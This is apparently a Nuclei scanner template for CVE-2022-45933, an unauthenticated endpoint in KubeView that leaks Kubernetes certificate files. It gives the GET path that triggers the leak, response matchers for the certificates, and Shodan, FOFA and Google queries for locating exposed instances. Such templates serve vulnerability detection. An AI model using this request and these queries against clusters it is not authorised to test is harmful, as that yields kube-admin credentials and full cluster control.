id: CVE-2022-45933 info: name: KubeView <=0.1.31 - Information Disclosure author: For3stCo1d severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: | Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 - https://nvd.nist.gov/vuln/detail/CVE-2022-45933 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 epss-score: 0.01085 epss-percentile: 0.84299 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: kubeview_project product: kubeview shodan-query: - http.title:"KubeView" - http.title:"kubeview" - http.favicon.hash:-379154636 fofa-query: - icon_hash=-379154636 - title="kubeview" google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project http: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system" matchers-condition: and matchers: - type: word part: body words: - 'BEGIN CERTIFICATE' - 'END CERTIFICATE' - 'kubernetes.io' condition: and - type: status status: - 200 # digest: 4a0a0047304502203a57686d800971e9c2d9e5c6af79ff460d57e595cc69bce08b60c90622d3b2c7022100a476ff76a56c7f5fba89e4a8a776f2e7e19a8c74054dfd44dbdf5404bf76a99f:922c64590222798bb761d5b6d8e72950